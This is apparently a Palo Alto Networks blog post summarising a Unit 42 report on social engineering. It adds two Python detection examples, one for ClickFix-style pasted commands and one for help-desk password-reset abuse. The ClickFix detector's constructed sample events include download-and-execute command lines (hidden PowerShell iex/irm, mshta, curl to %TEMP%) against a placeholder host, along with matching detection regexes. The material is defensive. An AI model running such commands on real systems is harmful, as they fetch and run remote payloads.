Social Engineering on the Rise — New Unit 42 Report
How Cybercriminals and Nation-State Actors Are Leveraging Sophisticated Social Engineering Techniques to Attack Global Organizations at Scale
Today, Palo Alto Networks Unit 42 released the 2025 Unit 42 Global Incident Response Report: Social Engineering Edition. This report explores the top initial attack vector we observed over the past year – social engineering. During this period, over a third of all Unit 42 Incident Response cases began with a social engineering tactic.
The report analyzes how attackers are exploiting trust to breach organizations, leading to business disruption and financial loss. Insights are derived from Palo Alto Networks telemetry, over 700 incident response case studies, and Unit 42 threat research.
Social Engineering Data Reveals How Human Vulnerabilities Are Exploited
Social engineering is the most common initial access vector observed by Unit 42, with phishing accounting for 65% of social engineering-driven cases. These attacks often target privileged accounts (66%), utilize impersonation of internal personnel (45%) and involve callback or voice-based techniques (23%), which are becoming more sophisticated as attackers leverage AI.
The success of social engineering stems from exploiting human behavior and weak controls, rather than technical vulnerabilities. Our data reveals several key patterns driving the success of these social engineering attacks:
- Business Disruption: Social engineering attacks resulted in data exposure in 60% of cases, 16 percentage points higher than other initial access vectors. Business email compromise (BEC) accounted for roughly half of all social engineering cases, with nearly 60% of those leading to data exposure.
- Novel Vectors: While phishing leads, 35% of social engineering cases use methods like SEO poisoning, malvertising, smishing and MFA bombing. Attackers are expanding beyond email to other platforms and devices.
- Control Gaps: Ignored alerts (observed in 13% of all social engineering cases), excessive permissions (10%) and lack of MFA (10%) are common weaknesses. Overwhelmed security teams often miss or deprioritize alerts.
AI Fuels a New Era of Social Engineering
AI has the power to reshape social engineering threats. While traditional methods persist, attackers are now using AI tools for speed, realism and scale. Unit 42 has observed three levels of AI-enabled tooling in incidents:
- Automation tools accelerate intrusion steps.
- Generative AI creates human-like content for personalized lures, voice cloning and adaptive interactions.
- Agentic AI autonomously executes multistep tasks, including cross-platform reconnaissance and creating synthetic identities for targeted campaigns.
This indicates a shift where AI components support conventional social engineering, increasing the scale, pace and adaptability of attacks.
Social Engineering Can Be Both Highly Targeted and Highly Scalable
In the report, Unit 42 outlines two top observed social engineering models, both designed to bypass controls by mimicking trusted activity:
High-touch compromise targets specific individuals in real time. Threat actors impersonate staff, exploit help desks and escalate access without deploying malware. This often involves voice lures, live pretexts and stolen identity data, as seen in Muddled Libra and various nation-state activities. These white-glove attacks are highly targeted and tailored, combining help desk impersonation, voice spoofing and technical reconnaissance to achieve deep access, broader system control and a higher potential for monetization.
At-scale deception includes ClickFix-style campaigns, SEO poisoning, fake browser prompts and blended lures that trigger user-initiated compromise across multiple devices and platforms. Large-scale ClickFix campaigns trick users into executing malware themselves: a fraudulent system prompt or CAPTCHA test instructs the victim to copy a command and paste it into a terminal or the Run dialog, so the victim, not an exploit, launches the payload. We’ve observed these attacks across healthcare, retail and government sectors, often resulting in widespread credential compromise and operational downtime.
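As an added illustration (not code from the Unit 42 report or from Palo Alto Networks), the following Python script scores constructed, Sysmon-style process-creation records for the execution pattern a ClickFix lure produces: a scripting host or download utility spawned by explorer.exe (the Run dialog) or an interactive shell, with a command line showing a hidden window, in-memory execution, a remote fetch, staging in the temp directory, or the "I am not a robot" verification text that lures append to the pasted command. The event field names, indicator weights, threshold and sample records are assumptions chosen for the example; the heuristics are a starting point for a hunt query, not a complete detection.

```python
"""Heuristic ClickFix-style execution detector over process-creation events.

Added example: the event schema, weights, threshold and sample records are
constructed for illustration and are not any product's format or rule.
"""
import re

# Binaries a pasted ClickFix command typically invokes.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "msiexec.exe",
}
# Parents that indicate a human typed or pasted the command: the Run dialog
# launches children under explorer.exe; terminals run the shell as parent.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}

# (regex, weight, label): every matching indicator adds its weight to the score.
INDICATORS = [
    (r"-(?:w|win|windowstyle)\s+hidden", 2, "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", 2, "encoded command"),
    (r"\b(?:iex|invoke-expression)\b", 2, "in-memory execution"),
    (r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|curl|wget|certutil)\b", 2, "remote payload fetch"),
    (r"https?://", 1, "url in command"),
    (r"\bmshta(?:\.exe)?\s+(?:https?|vbscript|javascript):", 3, "mshta remote/script"),
    (r"%temp%|\\appdata\\local\\temp", 1, "temp-dir staging"),
    (r"-(?:nop|noprofile)\b", 1, "no profile"),
    (r"-(?:ep|executionpolicy)\s+bypass", 1, "policy bypass"),
    (r"not a robot|captcha|verification id", 3, "lure residue in command"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), w, label) for p, w, label in INDICATORS]


def score_command(command_line):
    """Return (score, [labels]) for one command line."""
    score, reasons = 0, []
    for rx, weight, label in COMPILED:
        if rx.search(command_line):
            score += weight
            reasons.append(label)
    return score, reasons


def detect_clickfix(events, threshold=4):
    """Flag interactive launches of script hosts whose command line scores >= threshold."""
    alerts = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
        if image not in SCRIPT_HOSTS or parent not in INTERACTIVE_PARENTS:
            continue  # service or scheduled-task launches need a different rule
        score, reasons = score_command(ev["command_line"])
        if score >= threshold:
            alerts.append({"user": ev["user"], "image": image, "parent": parent,
                           "score": score, "reasons": reasons})
    return alerts


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {   # classic ClickFix: Win+R paste with a fake reCAPTCHA comment at the end
        "user": "CORP\\jdoe", "parent_image": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "command_line": 'powershell -w hidden -nop -c "iex (irm https://example.invalid/c)" '
                        "# \u2705 ''I am not a robot - reCAPTCHA Verification ID: 7624''",
    },
    {   # mshta variant fetching a remote HTA
        "user": "CORP\\asmith", "parent_image": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\mshta.exe",
        "command_line": "mshta https://example.invalid/x.hta",
    },
    {   # benign: admin double-clicks a maintenance script
        "user": "CORP\\ops", "parent_image": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "command_line": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    },
    {   # not a script host: ignored by the gate
        "user": "NT AUTHORITY\\SYSTEM", "parent_image": "C:\\Windows\\System32\\services.exe",
        "image": "C:\\Windows\\System32\\svchost.exe", "command_line": "svchost.exe -k netsvcs",
    },
    {   # cmd/curl variant staging a binary in %TEMP%
        "user": "CORP\\bchen", "parent_image": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\cmd.exe",
        "command_line": "cmd.exe /c curl -s https://example.invalid/a.exe -o %TEMP%\\a.exe && %TEMP%\\a.exe",
    },
    {   # encoded PowerShell from a scheduled task: out of scope for this rule
        "user": "NT AUTHORITY\\SYSTEM", "parent_image": "C:\\Windows\\System32\\svchost.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "command_line": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
]

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(alert)
```

On an endpoint that has already been hit, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a cheap forensic confirmation of the paste, since the full pasted command is recorded there.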
How Organizations Become Low-Hanging Fruit for Social Engineering
Social engineering persists due to overpermissioned access, gaps in behavioral visibility and unverified user trust in human processes. Threat actors exploit identity systems, help desk protocols and fast-track approvals by mimicking routine activity. To counter this, security leaders must shift beyond user awareness, recognizing social engineering as a systemic threat. This requires:
- Implementing behavioral analytics and identity threat detection and response (ITDR) to proactively detect credential misuse.
- Securing identity recovery processes and enforcing conditional access.
- Expanding zero trust principles to encompass users, not just network perimeters.
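To make "securing identity recovery processes" and "detect credential misuse" concrete, here is an added Python example (not Unit 42's or any vendor's code) that correlates constructed identity-log events for the chain a help desk impersonation typically produces: a help-desk-initiated password reset, followed within a short window by a successful sign-in from an IP address the account has never used, registration of a new MFA method and activation of a privileged role. The event types, field names, per-account baseline IP sets and the 60-minute window are assumptions for the example.

```python
"""Correlate identity events that follow a help-desk password reset.

Added example with a constructed event schema: event types, field names,
baseline IPs and the 60-minute window are assumptions, not any IdP's format.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_recovery_abuse(events, baseline_ips, window_minutes=60):
    """Return one alert per help-desk reset that is followed, inside the window,
    by a sign-in from an unseen IP, a new MFA registration or a privileged action.
    Severity: critical if all three appear, high if new MFA plus another signal,
    medium otherwise."""
    by_user = defaultdict(list)
    for ev in events:
        by_user[ev["user"]].append(ev)
    window = timedelta(minutes=window_minutes)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: parse_ts(e["ts"]))
        known = set(baseline_ips.get(user, ()))
        for i, ev in enumerate(evs):
            if ev["type"] != "helpdesk_password_reset":
                continue
            t0 = parse_ts(ev["ts"])
            kinds, findings = set(), []
            for later in evs[i + 1:]:
                if parse_ts(later["ts"]) - t0 > window:
                    break  # events are sorted, so nothing later is in the window
                if (later["type"] == "sign_in" and later.get("result") == "success"
                        and later["ip"] not in known):
                    kinds.add("new_ip")
                    findings.append(f"sign-in from unseen IP {later['ip']}")
                elif later["type"] == "mfa_method_registered":
                    kinds.add("new_mfa")
                    findings.append(f"new MFA method registered: {later['method']}")
                elif later["type"] in ("privileged_role_activated", "group_member_added"):
                    kinds.add("priv")
                    findings.append(f"privileged action: {later.get('role') or later.get('group')}")
            if not kinds:
                continue
            if kinds == {"new_ip", "new_mfa", "priv"}:
                severity = "critical"
            elif "new_mfa" in kinds and len(kinds) >= 2:
                severity = "high"
            else:
                severity = "medium"
            alerts.append({"user": user, "reset_by": ev["actor"], "reset_ts": ev["ts"],
                           "severity": severity, "findings": findings})
    return alerts


# Constructed sample logs (not real telemetry); RFC 5737 test addresses.
IDENTITY_EVENTS = [
    # jdoe: full help-desk impersonation chain within 20 minutes
    {"ts": "2025-05-12T09:02:10Z", "user": "jdoe", "type": "helpdesk_password_reset", "actor": "helpdesk-agent-17", "ip": "10.0.5.23"},
    {"ts": "2025-05-12T09:05:41Z", "user": "jdoe", "type": "sign_in", "ip": "198.51.100.77", "result": "success"},
    {"ts": "2025-05-12T09:06:30Z", "user": "jdoe", "type": "mfa_method_registered", "ip": "198.51.100.77", "method": "authenticator_app"},
    {"ts": "2025-05-12T09:20:05Z", "user": "jdoe", "type": "privileged_role_activated", "ip": "198.51.100.77", "role": "Global Administrator"},
    # asmith: legitimate reset, known IP, MFA re-enrolled hours later (outside window)
    {"ts": "2025-05-12T14:00:00Z", "user": "asmith", "type": "helpdesk_password_reset", "actor": "helpdesk-agent-03", "ip": "10.0.5.23"},
    {"ts": "2025-05-12T14:03:12Z", "user": "asmith", "type": "sign_in", "ip": "203.0.113.10", "result": "success"},
    {"ts": "2025-05-12T16:30:00Z", "user": "asmith", "type": "mfa_method_registered", "ip": "203.0.113.10", "method": "fido2"},
    # bchen: reset then sign-in from an unseen IP only
    {"ts": "2025-05-12T11:00:00Z", "user": "bchen", "type": "helpdesk_password_reset", "actor": "helpdesk-agent-09", "ip": "10.0.5.23"},
    {"ts": "2025-05-12T11:04:00Z", "user": "bchen", "type": "sign_in", "ip": "198.51.100.9", "result": "success"},
]
BASELINE_IPS = {"jdoe": {"203.0.113.45"}, "asmith": {"203.0.113.10"}, "bchen": {"203.0.113.80"}}

if __name__ == "__main__":
    for alert in detect_recovery_abuse(IDENTITY_EVENTS, BASELINE_IPS):
        print(alert)
```

The medium-severity case is where a help desk callback or step-up verification would have been cheap to enforce; the critical case is what an unverified reset plus self-service MFA enrollment lets an impersonator reach, and it is the pattern to route straight to the identity response team rather than a queue.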
As technology evolves, attackers exploit human trust and productivity. The nature of trust, verification and defense is changing. This report reflects trends and attacker innovations observed over the past year. By contextualizing these findings, security leaders gain tools to recalibrate defenses, protect business continuity and maintain an edge in an evolving threat environment.
For a deeper dive into these evolving tactics and Unit 42’s comprehensive analysis, download the full report here.
To discover how Unit 42 can empower your organization, visit our website.
The post Social Engineering on the Rise — New Unit 42 Report appeared first on Palo Alto Networks Blog.